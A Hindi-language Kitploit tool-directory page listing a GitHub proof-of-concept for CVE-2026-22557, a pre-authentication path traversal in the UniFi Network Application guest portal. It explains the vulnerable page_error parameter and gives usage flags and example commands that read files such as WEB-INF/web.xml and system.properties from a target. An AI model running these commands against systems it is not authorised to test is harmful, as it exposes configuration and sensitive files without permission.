Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22557-PoC — PoC for UniFi Network Application Pre-Auth Path Traversal (CVE-2026-22557) | Kitploit
उपकरण/GitHubGitHub/thepotatoofdoom/cve-2026-22557-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubthepotatoofdoom/cve-2026-22557-poc

CVE-2026-22557-PoC

PoC for UniFi Network Application Pre-Auth Path Traversal (CVE-2026-22557)

रिपॉजिटरी देखें
4135 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22557 -- UniFi नेटवर्क एप्लिकेशन प्री-ऑथ पाथ ट्रैवर्सल

UniFi नेटवर्क एप्लिकेशन गेस्ट पोर्टल (/guest/s/{site}/login) में प्री-ऑथेंटिकेटेड पाथ ट्रैवर्सल। page_error क्वेरी पैरामीटर को बिना सत्यापन के रिसोर्स लोडर को पास किया जाता है, जिससे एक अनऑथेंटिकेटेड हमलावर वेबऐप से फ़ाइलें पढ़ सकता है (जैसे WEB-INF/web.xml)।

यदि गेस्ट पोर्टल पेज को कस्टमाइज़ किया गया है, तो रिसोर्स लोडर एक रॉ FileInputStream शाखा पर वापस आता प्रतीत होता है जो कॉन्टेक्स्ट रूट के बाहर अंतर्निहित सिस्टम पर मनमानी फ़ाइलों तक पहुंच सकती है। मैंने अभी तक इसकी पुष्टि नहीं की है और समय मिलने पर आगे जांच करूंगा।

उपयोग

pip install requests
python CVE-2026-22557.py <target_url> [-f FILE] [-g GUEST_PATH] [-o OUTPUT] [-x PROXY]
फ़्लैगविवरणडिफ़ॉल्ट
targetलक्ष्य URL (जैसे https://host:8843)(आवश्यक)
-fपढ़ने के लिए सापेक्ष पथ../../web.xml
-gगेस्ट पोर्टल पथ/guest/s/default/login
-oप्रतिक्रिया को फ़ाइल में लिखें(stdout)
-xप्रॉक्सी URL(कोई नहीं)

उदाहरण

image
# डिफ़ॉल्ट -- WEB-INF/web.xml पढ़ें (HTTPS गेस्ट पोर्टल)
python CVE-2026-22557.py https://192.168.1.1:8843

# HTTP गेस्ट पोर्टल
python CVE-2026-22557.py http://192.168.1.1:8880

# क्लासपाथ रिसोर्स पढ़ें
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../system.properties

# API स्कीमा पढ़ें और फ़ाइल में सहेजें
python CVE-2026-22557.py https://192.168.1.1:8843 -f ../api/fields/Setting.json -o setting.json

# अलग साइट नाम
python CVE-2026-22557.py https://192.168.1.1:8843 -g /guest/s/mysite/login

# प्रॉक्सी के माध्यम से
python CVE-2026-22557.py https://192.168.1.1:8843 -x http://127.0.0.1:8080
टूल डाउनलोड करें